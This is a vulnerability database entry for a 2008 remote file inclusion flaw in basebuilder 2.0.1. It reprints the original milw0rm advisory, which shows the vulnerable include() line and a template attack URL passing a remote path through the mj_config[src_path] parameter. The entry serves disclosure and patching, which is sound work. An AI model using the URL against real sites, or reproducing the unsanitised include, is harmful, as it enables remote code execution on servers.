header-logo
Suggest Exploit
vendor:
basebuilder
by:
dun
8.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: basebuilder
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:basebuilder:basebuilder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

basebuilder <= 2.0.1 Remote File Inclusion Vulnerability

A vulnerability exists in basebuilder version 2.0.1 and prior. The vulnerability is due to the 'src/main.inc.php' script not properly sanitizing user-supplied input to the 'mj_config[src_path]' parameter. This can be exploited to include arbitrary files from remote locations by passing a URL in the 'mj_config[src_path]' parameter.

Mitigation:

Upgrade to the latest version of basebuilder.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #####################################################################
 #  [ basebuilder <= 2.0.1 ]   Remote File Inclusion Vulnerability   #
 #####################################################################
 #
 # Script site: http://basebuilder.sourceforge.net/
 # Download: http://sourceforge.net/project/showfiles.php?group_id=110199
 #
 # Vuln: http://site.com/basebuilder/src/main.inc.php?mj_config[src_path]=[spread???]
 #      
 #
 # Bug: ./basebuilder-2.0.1/src/main.inc.php (line: 56)
 #
 # ...
 #	include($mj_config['src_path'] . '/classes/class.mj.basebuilder.inc.php');
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-22]